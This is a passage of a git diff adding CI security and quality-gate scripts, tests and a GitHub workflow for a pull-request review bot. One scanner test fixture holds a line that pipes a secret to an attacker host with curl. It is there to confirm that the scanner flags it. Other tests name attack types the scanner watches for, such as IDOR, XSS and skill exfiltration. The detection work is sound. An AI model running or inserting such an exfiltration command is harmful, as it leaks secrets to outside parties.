+    patch: `+  const res = await fetch('https://api.example.com')`,
+  }];
+  assert.equal(scanTestPatterns(files).length, 0);
+});
+
+test('scanTestPatterns: flags suspicious patterns in __tests__ directories', () => {
+  const files = [{
+    filename: 'src/__tests__/foo.ts',
+    patch: `+  execSync('curl https://attacker.com?data=' + secret)`,
+  }];
+  assert.ok(scanTestPatterns(files).length > 0);
+});
+
+// ── scanSensitivePaths ───────────────────────────────────────────────────────
+
+test('scanSensitivePaths: flags changes to agents route (API key IDOR / cross-tenant)', () => {
+  const files = [{ filename: 'server/src/routes/agents.ts', status: 'modified' }];
+  assert.ok(scanSensitivePaths(files).length > 0);
+});
+
+test('scanSensitivePaths: flags changes to MarkdownBody (XSS via urlTransform)', () => {
+  const files = [{ filename: 'ui/src/components/MarkdownBody.tsx', status: 'modified' }];
+  assert.ok(scanSensitivePaths(files).length > 0);
+});
+
+test('scanSensitivePaths: flags changes to company-skills route (malicious skill exfil)', () => {
+  const files = [{ filename: 'server/src/routes/company-skills.ts', status: 'modified' }];
+  assert.ok(scanSensitivePaths(files).length > 0);
+});
+
+test('scanSensitivePaths: ignores unrelated paths', () => {
+  const files = [{ filename: 'server/src/utils/date.ts', status: 'modified' }];
+  assert.equal(scanSensitivePaths(files).length, 0);
+});
+
+test('scanSensitivePaths: ignores removed files even on sensitive paths', () => {
+  const files = [{ filename: 'server/src/routes/agents.ts', status: 'removed' }];
+  assert.equal(scanSensitivePaths(files).length, 0);
+});
diff --git a/.github/scripts/tests/check-pr-template.test.mjs b/.github/scripts/tests/check-pr-template.test.mjs
new file mode 100644
index 00000000..8e9881ef
--- /dev/null
+++ b/.github/scripts/tests/check-pr-template.test.mjs
@@ -0,0 +1,123 @@
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
+import { checkTemplate } from '../check-pr-template.mjs';
+
+const VALID_BODY = `
+## Thinking Path
+First I considered the root cause of the bug in the cursor logic. Then I traced the execution path through the pagination code. Finally I identified that the date binding was missing a toISOString call.
+
+## What Changed
+- Added .toISOString() call before binding anchor.createdAt to the postgres query
+
+## Verification
+Run pnpm test:run:general and verify the cursor pagination tests pass.
+
+## Risks
+Low risk — isolated change to one query parameter.
+
+## Model Used
+Claude Sonnet 4.5, 200k context window, extended thinking enabled, tool use: read/edit files
+`;
+
+test('passes with valid full template', () => {
+  const result = checkTemplate(VALID_BODY);
+  assert.equal(result.passed, true);
+  assert.deepEqual(result.failures, []);
+});
+
+test('fails when Thinking Path section is missing', () => {
+  const body = VALID_BODY.replace('## Thinking Path', '## Removed');
+  const result = checkTemplate(body);
+  assert.equal(result.passed, false);
+  assert.ok(result.failures.some(f => f.includes('Thinking Path')));
+});
+
+test('fails when Thinking Path has fewer than 3 sentences', () => {
+  const body = VALID_BODY.replace(
+    /## Thinking Path\n[\s\S]*?\n## What Changed/,
+    '## Thinking Path\nOnly one sentence here.\n\n## What Changed'
+  );
+  const result = checkTemplate(body);
+  assert.equal(result.passed, false);
+  assert.ok(result.failures.some(f => f.includes('Thinking Path') && f.includes('sentence')));
+});
+
+test('passes Thinking Path written as a bullet list without terminal punctuation', () => {
+  const body = VALID_BODY.replace(
+    /## Thinking Path\n[\s\S]*?\n## What Changed/,
+    `## Thinking Path
+- First point about the root cause of the bug
+- Second point about how the fix addresses it
+- Third point about why this approach was chosen
+
+## What Changed`
+  );
+  const result = checkTemplate(body);
+  assert.equal(result.passed, true);
+  assert.deepEqual(result.failures, []);
+});
+
+test('passes Thinking Path written as a blockquoted bullet list', () => {
+  const body = VALID_BODY.replace(
+    /## Thinking Path\n[\s\S]*?\n## What Changed/,
+    `## Thinking Path
+> - First point in a blockquote
+> - Second point in a blockquote
+> - Third point in a blockquote
+
+## What Changed`
+  );
+  const result = checkTemplate(body);
+  assert.equal(result.passed, true);
+  assert.deepEqual(result.failures, []);
+});
+
+test('passes Thinking Path written as multiple paragraphs without terminal punctuation', () => {
+  const body = VALID_BODY.replace(
+    /## Thinking Path\n[\s\S]*?\n## What Changed/,
+    `## Thinking Path
+First paragraph explaining the situation in detail
+
+Second paragraph explaining the chosen approach in detail
+
+Third paragraph explaining the tradeoffs in detail
+
+## What Changed`
+  );
+  const result = checkTemplate(body);
+  assert.equal(result.passed, true);
+  assert.deepEqual(result.failures, []);
+});
+
+test('fails when Model Used section is missing', () => {
+  const body = VALID_BODY.replace('## Model Used', '## Removed');
+  const result = checkTemplate(body);
+  assert.equal(result.passed, false);
+  assert.ok(result.failures.some(f => f.includes('Model Used')));
+});
+
+test('fails when Model Used contains placeholder text', () => {
+  const body = VALID_BODY.replace(
+    /## Model Used\n[\s\S]*/,
+    '## Model Used\nprovider, model id/version, context window, reasoning mode, tool use'
+  );
+  const result = checkTemplate(body);
+  assert.equal(result.passed, false);
+  assert.ok(result.failures.some(f => f.includes('Model Used') && f.includes('placeholder')));
+});
+
+test('fails when What Changed section is empty', () => {
+  const body = VALID_BODY.replace(
+    /## What Changed\n[\s\S]*?\n## Verification/,
+    '## What Changed\n\n## Verification'
+  );
+  const result = checkTemplate(body);
+  assert.equal(result.passed, false);
+  assert.ok(result.failures.some(f => f.includes('What Changed')));
+});
+
+test('returns multiple failures at once', () => {
+  const result = checkTemplate('');
+  assert.equal(result.passed, false);
+  assert.ok(result.failures.length >= 5);
+});
diff --git a/.github/scripts/tests/check-pr-test-coverage.test.mjs b/.github/scripts/tests/check-pr-test-coverage.test.mjs
new file mode 100644
index 00000000..a76a71b2
--- /dev/null
+++ b/.github/scripts/tests/check-pr-test-coverage.test.mjs
@@ -0,0 +1,101 @@
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
+import { checkTestCoverage } from '../check-pr-test-coverage.mjs';
+
+const makeFiles = (filenames) =>
+  filenames.map(filename => ({ filename, status: 'modified' }));
+
+// Existing tests with title parameter added (fix: prefix means test required)
+
+test('passes when .test.ts file is changed', () => {
+  assert.equal(checkTestCoverage(makeFiles(['src/foo.test.ts', 'src/foo.ts']), 'fix: bug').passed, true);
+});
+
+test('passes when .spec.js file is changed', () => {
+  assert.equal(checkTestCoverage(makeFiles(['src/bar.spec.js']), 'fix: bug').passed, true);
+});
+
+test('passes when file under tests/ is changed', () => {
+  assert.equal(checkTestCoverage(makeFiles(['tests/unit/baz.ts']), 'fix: bug').passed, true);
+});
+
+test('passes when file under __tests__ is changed', () => {
+  assert.equal(checkTestCoverage(makeFiles(['src/__tests__/qux.ts']), 'fix: bug').passed, true);
+});
+
+test('fails when fix: PR has no tests', () => {
+  const result = checkTestCoverage(makeFiles(['src/foo.ts', 'src/bar.ts']), 'fix: bug');
+  assert.equal(result.passed, false);
+  assert.ok(result.failures[0].includes('test'));
+});
+
+test('fails when feat: PR has no tests', () => {
+  const result = checkTestCoverage(makeFiles(['src/foo.ts']), 'feat: new feature');
+  assert.equal(result.passed, false);
+});
+
+test('fails with empty file list and fix: prefix', () => {
+  assert.equal(checkTestCoverage([], 'fix: bug').passed, false);
+});
+
+test('ignores removed test files', () => {
+  const files = [
+    { filename: 'src/foo.test.ts', status: 'removed' },
+    { filename: 'src/foo.ts', status: 'modified' },
+  ];
+  assert.equal(checkTestCoverage(files, 'fix: bug').passed, false);
+});
+
+// New tests for prefix-aware skip behavior
+
+test('skips test requirement for docs: prefix (markdown only)', () => {
+  assert.equal(checkTestCoverage(makeFiles(['README.md', 'docs/setup.md']), 'docs: update guide').passed, true);
+});
+
+test('skips test requirement for chore: prefix (config only)', () => {
+  assert.equal(checkTestCoverage(makeFiles(['.gitignore', '.github/labels.yml']), 'chore: cleanup').passed, true);
+});
+
+test('skips test requirement for refactor: prefix', () => {
+  assert.equal(checkTestCoverage(makeFiles(['src/foo.ts']), 'refactor: rename function').passed, true);
+});
+
+test('skips test requirement for style: prefix', () => {
+  assert.equal(checkTestCoverage(makeFiles(['src/foo.ts']), 'style: format').passed, true);
+});
+
+// New tests for mismatch detection
+
+test('flags docs: PR with source code changes', () => {
+  const result = checkTestCoverage(makeFiles(['src/api.ts', 'README.md']), 'docs: update docs');
+  assert.equal(result.passed, false);
+  assert.ok(result.failures[0].includes('docs:'));
+  assert.ok(result.failures[0].includes('source code'));
+});
+
+test('flags chore: PR with source code changes', () => {
+  const result = checkTestCoverage(makeFiles(['src/server.ts']), 'chore: cleanup');
+  assert.equal(result.passed, false);
+  assert.ok(result.failures[0].includes('chore:'));
+});
+
+test('does NOT flag chore: PR with only config files', () => {
+  const result = checkTestCoverage(makeFiles(['package.json', '.eslintrc.js']), 'chore: bump');
+  // .eslintrc.js is a .js file but it's config — current rule will flag it. This documents that.
+  // For now we err on the side of flagging — contributor can retitle if needed.
+  assert.equal(result.passed, false);
+});
+
+test('does NOT flag refactor: PR with source code (refactor expects source changes)', () => {
+  const result = checkTestCoverage(makeFiles(['src/foo.ts']), 'refactor: rename');
+  assert.equal(result.passed, true);
+});
+
+test('requires test when no prefix used', () => {
+  const result = checkTestCoverage(makeFiles(['src/foo.ts']), 'Some PR with no prefix');
+  assert.equal(result.passed, false);
+});
+
+test('handles scoped prefix like fix(server):', () => {
+  assert.equal(checkTestCoverage(makeFiles(['src/foo.test.ts', 'src/foo.ts']), 'fix(server): bug').passed, true);
+});
diff --git a/.github/scripts/tests/fetch-pr-files.test.mjs b/.github/scripts/tests/fetch-pr-files.test.mjs
new file mode 100644
index 00000000..a329e372
--- /dev/null
+++ b/.github/scripts/tests/fetch-pr-files.test.mjs
@@ -0,0 +1,37 @@
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
+import { fetchAllPullRequestFiles } from '../fetch-pr-files.mjs';
+
+test('fetchAllPullRequestFiles: returns a single short page', async () => {
+  const seenPaths = [];
+  const files = await fetchAllPullRequestFiles(async (path) => {
+    seenPaths.push(path);
+    return [{ filename: 'src/only.ts' }];
+  }, 'paperclipai/paperclip', 6469, 'token');
+
+  assert.deepEqual(seenPaths, [
+    '/repos/paperclipai/paperclip/pulls/6469/files?per_page=100&page=1',
+  ]);
+  assert.equal(files.length, 1);
+});
+
+test('fetchAllPullRequestFiles: keeps fetching when a page is full', async () => {
+  const seenPaths = [];
+  const files = await fetchAllPullRequestFiles(async (path) => {
+    seenPaths.push(path);
+    const page = Number(new URL(`https://github.com${path}`).searchParams.get('page'));
+    if (page === 1) {
+      return Array.from({ length: 100 }, (_, index) => ({
+        filename: `src/file-${index + 1}.ts`,
+      }));
+    }
+    return [{ filename: 'src/file-101.ts' }];
+  }, 'paperclipai/paperclip', 6469, 'token');
+
+  assert.deepEqual(seenPaths, [
+    '/repos/paperclipai/paperclip/pulls/6469/files?per_page=100&page=1',
+    '/repos/paperclipai/paperclip/pulls/6469/files?per_page=100&page=2',
+  ]);
+  assert.equal(files.length, 101);
+  assert.equal(files.at(-1)?.filename, 'src/file-101.ts');
+});
diff --git a/.github/scripts/tests/get-bot-token.test.mjs b/.github/scripts/tests/get-bot-token.test.mjs
new file mode 100644
index 00000000..e17953f1
--- /dev/null
+++ b/.github/scripts/tests/get-bot-token.test.mjs
@@ -0,0 +1,33 @@
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
+import { resolveInstallationId } from '../get-bot-token.mjs';
+
+test('resolveInstallationId: uses the repo installation endpoint when repo context is available', async () => {
+  const seenPaths = [];
+  const installationId = await resolveInstallationId(async (path) => {
+    seenPaths.push(path);
+    return { id: 42 };
+  }, 'jwt', 'paperclipai/paperclip', 'paperclipai');
+
+  assert.equal(installationId, 42);
+  assert.deepEqual(seenPaths, ['/repos/paperclipai/paperclip/installation']);
+});
+
+test('resolveInstallationId: falls back to the matching owner installation', async () => {
+  const installationId = await resolveInstallationId(async () => ([
+    { id: 1, account: { login: 'someone-else' } },
+    { id: 7, account: { login: 'PaperclipAI' } },
+  ]), 'jwt', undefined, 'paperclipai');
+
+  assert.equal(installationId, 7);
+});
+
+test('resolveInstallationId: rejects ambiguous installations without repo or owner context', async () => {
+  await assert.rejects(
+    resolveInstallationId(async () => ([
+      { id: 1, account: { login: 'org-one' } },
+      { id: 2, account: { login: 'org-two' } },
+    ]), 'jwt'),
+    /Multiple commitperclip installations found/
+  );
+});
diff --git a/.github/scripts/tests/run-quality-gates.test.mjs b/.github/scripts/tests/run-quality-gates.test.mjs
new file mode 100644
index 00000000..5a442153
--- /dev/null
+++ b/.github/scripts/tests/run-quality-gates.test.mjs
@@ -0,0 +1,43 @@
+import { test } from 'node:test';
+import assert from 'node:assert/strict';
+import { findExistingComment } from '../run-quality-gates.mjs';
+
+test('findExistingComment: paginates until it finds the commitperclip comment', async () => {
+  const seenPaths = [];
+  const comment = await findExistingComment(async (path) => {
+    seenPaths.push(path);
+    if (path.endsWith('page=1')) {
+      return Array.from({ length: 100 }, (_, index) => ({
+        id: index + 1,
+        user: { login: 'someone-else' },
+        body: 'unrelated',
+      }));
+    }
+    if (path.endsWith('page=2')) {
+      return [{
+        id: 200,
+        user: { login: 'commitperclip[bot]' },
+        body: 'Looks good.\n\n— commitperclip',
+      }];
+    }
+    return [];
+  }, 'token', 'paperclipai/paperclip', 6469);
+
+  assert.equal(comment.id, 200);
+  assert.deepEqual(seenPaths, [
+    '/repos/paperclipai/paperclip/issues/6469/comments?per_page=100&page=1',
+    '/repos/paperclipai/paperclip/issues/6469/comments?per_page=100&page=2',
+  ]);
+});
+
+test('findExistingComment: returns null when no signed comment exists', async () => {
+  const comment = await findExistingComment(async () => ([
+    {
+      id: 1,
+      user: { login: 'commitperclip[bot]' },
+      body: 'Unsigned status update',
+    },
+  ]), 'token', 'paperclipai/paperclip', 6469);
+
+  assert.equal(comment, null);
+});
diff --git a/.github/workflows/commitperclip-review.yml b/.github/workflows/commitperclip-review.yml
new file mode 100644
index 00000000..2e385d1f
--- /dev/null
+++ b/.github/workflows/commitperclip-review.yml
@@ -0,0 +1,69 @@
+name: commitperclip PR Review
+
+on:
+  pull_request_target:
+    types: [opened, synchronize, reopened]
+
+# Always runs from base branch context — never executes PR code.
+# pull_request_target gives access to secrets for untrusted fork PRs.
+
+permissions:
+  pull-requests: write
+  security-events: write
+  checks: write
+  contents: read
+
+jobs:
+  review:
+    runs-on: ubuntu-latest
+    timeout-minutes: 5
+    steps:
+      - name: Checkout base branch (never PR code)
+        uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2
+        with:
+          ref: master
+
+      - name: Dependency Review
+        uses: actions/dependency-review-action@2031cfc080254a8a887f58cffee85186f0e49e48 # v4.9.0
+        with:
+          base-ref: ${{ github.event.pull_request.base.sha }}
+          head-ref: ${{ github.event.pull_request.head.sha }}
+
+      - name: Set up Node
+        uses: actions/setup-node@49933ea5288caeca8642d1e84afbd3f7d6820020 # v4.4.0
+        with:
+          node-version: '20'
+
+      - name: Generate commitperclip token
+        id: token
+        run: |
+          TOKEN=$(node .github/scripts/get-bot-token.mjs)
+          echo "::add-mask::$TOKEN"
+          echo "value=$TOKEN" >> $GITHUB_OUTPUT
+        env:
+          COMMITPERCLIP_KEY: ${{ secrets.COMMITPERCLIP_KEY }}
+
+      - name: Run quality gates
+        id: quality
+        run: node .github/scripts/run-quality-gates.mjs
+        continue-on-error: true
+        env:
+          GH_TOKEN: ${{ steps.token.outputs.value }}
+          GH_REPO: ${{ github.repository }}
+          PR_NUMBER: ${{ github.event.pull_request.number }}
+          PR_AUTHOR: ${{ github.event.pull_request.user.login }}
+          PR_BRANCH: ${{ github.event.pull_request.head.ref }}
+
+      - name: Run security gates
+        run: node .github/scripts/check-pr-security.mjs
+        env:
+          GH_TOKEN: ${{ steps.token.outputs.value }}
+          GH_REPO: ${{ github.repository }}
+          PR_NUMBER: ${{ github.event.pull_request.number }}
+          PR_AUTHOR: ${{ github.event.pull_request.user.login }}
+
+      - name: Fail if quality gates failed
+        if: steps.quality.outcome == 'failure'
+        run: |
+          echo "One or more quality gates failed. See commitperclip comment on the PR for details."
+          exit 1
diff --git a/.gitignore b/.gitignore
index 2d8d5454..09af52ce 100644
--- a/.gitignore
+++ b/.gitignore
@@ -18,6 +18,8 @@ cli/tmp/
 
 # Scratch/seed scripts (but not scripts/ dir)
 check-*.mjs
+!.github/scripts/check-*.mjs
+!.github/scripts/tests/check-*.mjs
 !scripts/check-*.mjs
 new-agent*.json
 newcompany.json